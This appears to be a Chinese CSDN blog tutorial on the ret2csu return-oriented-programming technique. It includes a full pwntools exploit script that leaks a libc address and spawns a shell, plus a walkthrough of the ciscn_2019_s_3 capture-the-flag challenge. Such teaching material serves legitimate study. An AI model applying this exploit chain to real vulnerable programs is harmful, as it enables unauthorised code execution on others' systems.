ret2csu

于 2024-03-03 19:55:12 发布
阅读量709 收藏 13
点赞数 20
文章标签: 网络 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/T_Fire_of_Square/article/details/136436827
版权

ret2csu

个人见解

  • csu实际上是基于libc的一种泄露函数基地址的做法,其原理还是基于rop链的构造。大多时候我们难以找到每个寄存器对应的gadgets,但是当我们遇到wirte函数泄露的时候却必须要控制三个寄存器(64位首先存入数据的rdi,rsi,rdx),这时候,我们就可以利用 x64 下的 __libc_csu_init 中的 gadgets

  • 这个函数是用来对libc进行初始化操作的,所以这个函数一般都会存在。而我们所利用的是函数的两块区域。

    img

可以看到我们需要的三个寄存器分别被r14,r13,r12所赋值,而我们的gadget2可以操控这三个寄存器的值。那么我们的思路就很清晰了。

先通过gadget2修改寄存器值,返回到gadget把我们需要的寄存器值赋值,然后call write打印基地址,最后执行到gadget2

retn到我们需要溢出的函数地址。

exp:

from LibcSearcher import *
from pwn import *
​
io = process('64')
elf = ELF('./64')
context.arch = 'amd64'
context.log_level = 'debug'
​
padding = 0x8 + 8
write_plt = elf.plt['write']
write_got = elf.got['write']
gadget1 = 0x4011D8
gadget2 = 0x4011F2
rdi_ret = 0x4011fb
dofunc = elf.sym['dofunc']
​
payload = flat([b'a'*padding,gadget2,0,1,1,write_got,8,write_got,gadget1])
payload += p64(0xdeadbeef)*7
payload += p64(dofunc)
​
io.sendlineafter("input:",payload)
​
real_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
​
libc = LibcSearcher('write',real_addr)
libc_base = real_addr - libc.dump('write')
sys_addr = libc.dump('system') + libc_base
binsh = libc.dump('str_bin_sh') + libc_base
ret = 0x401016
​
payload2 = flat([b'a'*padding,ret,rdi_ret,binsh,sys_addr])
io.sendlineafter("input:",payload2)
io.interactive()
​

注:32位一般不会出现scu,因为其传参无需寄存器来存储,直接在栈上操作即可

接下来我以buu的ciscn_2019_s_3为例题来融汇贯通一下

         Ciscn_s_3

题目概括:
此题涉及到了ret2sycall和寄存器修改(可以视为csu)

首先我们发现这是一个静态连接,所以不是普通的libc,需要我们自己去给buff里面写入/bin/sh\x00,并且找出buff的最低地址位置。这里需要使用gbd查看

aaaaaaaa的位置在0x7fffffffde60,而write能从地址0x7fffffffde60输出到地址0x7fffffffde80,这里边的内容,发现有疑似栈的数据0x00007fffffffdf78,所以有bin_sh_addr = 栈的基地址 - 0x118。那我们利用read向栈上写/bin/sh字符串,再用write进行泄露/bin/sh的地址。

也就是说,因为write打印的话,是先从栈的低地址打印,再打印高地址的内容,那么先打印0x20的数据,再打印0x8的数据就是栈的基地址,再减去0x118就获得 /bin/sh的地址

这样我们就成功写入了/bin/sh

同时我们在gatgets中发现rax被赋予了56的值,这是execve的启动标志。所以这题我们可以使用callsys来获取shell

接着我们在csu函数中发现了我们需要的两个寄存器rdx和rsi,他们分别被r13和r14赋值

所以我们用kali ROPgadgets刚好发现有这三个寄存器,

并且我们还要让rbp的值与rbx相同(为1)一举两得

并且r15对应的是edi是rdi的低四节,所以并不能通过r15导入bin_sh,需要额外写入

最后我们构造ROP链即可

最后还要注意的是,我们给r12赋值了bin_sh+0x8(0x50也可以·),这是因为

在执行0x400589的时候会跳转到r12+rbx*8指向的地址去,而rbx为0,所以我们可以修改r12的值从而继续跳转,同时也绕过了cmp指令,所以我们的rbp便不强求必须为1了。

ps:0x8是跳到了pop_rdi的位置,而0x50则是mov_rax,两者虽然执行的东西不同,但都是为了获取retn函数,从而实现继续跳转。

本题要求能够将之前的知识融会贯通,同时,我们也要求能够知道一些汇编语言意思

还有gbd调试的熟练度与观察能力

T_Fire_of_Square
关注
  • 20
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
从o开始的pwn学习之ret2csu
jzc020121的博客
04-09 2954
ret2csu 前置知识 X64寄存器 我们知道,64位寄存器有RAX,RBX,RCX,RDX,RDI,RSI,RBP,RSP,R8,R9,R10,R11,R12,R13,R14,R15,而rdi,rsi,rdx,rcx,r8,r9便用来传递函数的前六个参数,如多于六个,便在放到栈里。 __libc_csu_init 一般的程序都会调用libc中的函数,而此函数便是来将libc初始化的,故此函数几乎是每一个程序所必备的。 gadget 我们在构造ROP链的时候,往往会用到能够给寄存器赋值的gadget,形如
PWN-ret2csu
recover517的博客
12-06 538
在x64中,如果遇到函数调用需要传入3个参数,分别依赖【rdi,rsi,rdx】三个寄存器,但通过ROPgadget无法找到相关的寄存器利用链,这时,我们就要开始考虑通过调用__libc_csu_init函数来实现传递3个参数的效果,这种实现方式,称为 ret2csu
pwn中级ROP——ret2csu
turtlesd的博客
04-27 855
地址 栈中数据 return前 a * 136 main函数return(rsp) 0x400606(gadget1) rsp + 8 0(填充数据) rsp + 16(rbx) 0 rsp + 24(rbp) 1 rsp + 32(r12) write_got_addr rsp + 40(r13) 1 rsp + 48(r14) write_got_addr rsp + 56(r15) 8 gadget1的return 0x4005F0(gadget2)...
好好说话之ret2csu
hollk’s blog
06-22 5786
一、x64寄存器 在64位程序中,函数的前6各参数是通过寄存器传递的,可以看到rdi作为第一个参数,rsi作为第二个参数,rdx作为第三个参数,rcx作为第四个参数,r8作为第五个参数,r9作为第六个参数。也就是说在函数调用参数的时候会依次在六个寄存器中寻找,如果参数多余6个,那么就需要在栈中寻找。 63 31 ...
pwn07.ret2syscall例题
11-11
ret2syscall例题
ret2libc exploit
07-07
### Return-to-libc (ret2libc) Exploit详解 #### 引言 在深入探讨Return-to-libc(简称ret2libc)技术之前,我们先简要回顾一下这一领域的背景知识。随着网络安全领域的不断发展,攻击者与防御者的对抗也在不断...
Performing a ret2libc Attack-InVoLuNTaRy
04-24
### 执行ret2libc攻击——InVoLuNTaRy #### 一、ret2libc攻击简介 **ret2libc**(返回到libc或返回到C库)是一种攻击技术,它允许攻击者在无需注入shellcode的情况下控制目标系统中的易受攻击进程。这种攻击方式...
C语言头文件 RETCODE
06-13
C语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言...RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RET
ret2libc2pwn 入门题
02-11
pwn 入门题
入门pwn题目ret2text
03-26
入门pwn题目ret2text
ret2libc1pwn 入门题
02-11
pwn 入门题
ret2-libc-puts64
最新发布
04-01
ret2-libc-puts64
ret2csu(以ciscn_2019_s_3为例子)
菊花的老窝
05-04 304
栈迁移顾名思义就是将原来的程序栈迁移到另一个地方,使得我们可以将构造的 ROP 链完整的填入。那么想要修改栈的位置,那么就需要修改寄存器 esp 和 ebp 的值。想要修改 esp 和 ebp 的值,我们需要用到leave和ret两个 gadget。
中级ROP之ret2csu
至臻求学,胸怀云月
02-22 7386
ret2csu 原理 在64位程序中,函数的前6个参数是通过寄存器传递的,但是大多数时候,我们很难找到每一个寄存器对应的gadgets。这时候,我们可以利用x64下的__libc_csu_init中的gadgets,如例二情况。 这个函数是用来对libc进行初始化操作的,而一般的程序都会调用libc函数,所以这个函数一定会存在。 下面是我在IDA摘出来的__libc_csu_init函数的汇编...
漏洞挖掘的艺术-面向二进制的静态漏洞挖掘
Yale的博客
09-18 2058
0x00 本文是本系列的第二篇,将对面向二进制程序的静态漏洞挖掘技术进行介绍与分析。 面向二进制程序的静态漏洞的挖掘技术由于缺少源代码中的结构化信息,面临着值集分析(vaule-set analysis,VSA)与控制流恢复不精确的问题,但是二进制程序相对于源码而言更容易获得,所以这方面的研究工作一直都有新的研究动态,并且会在0x02部分介绍目前流程的两种技术。在进一步分析之前,我们首先来具体解释前文提出的两个问题。 0x01 1.1 值集分析是一种结合数值分析和指针分析的静态分析算法。VSA是一种基于抽象
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值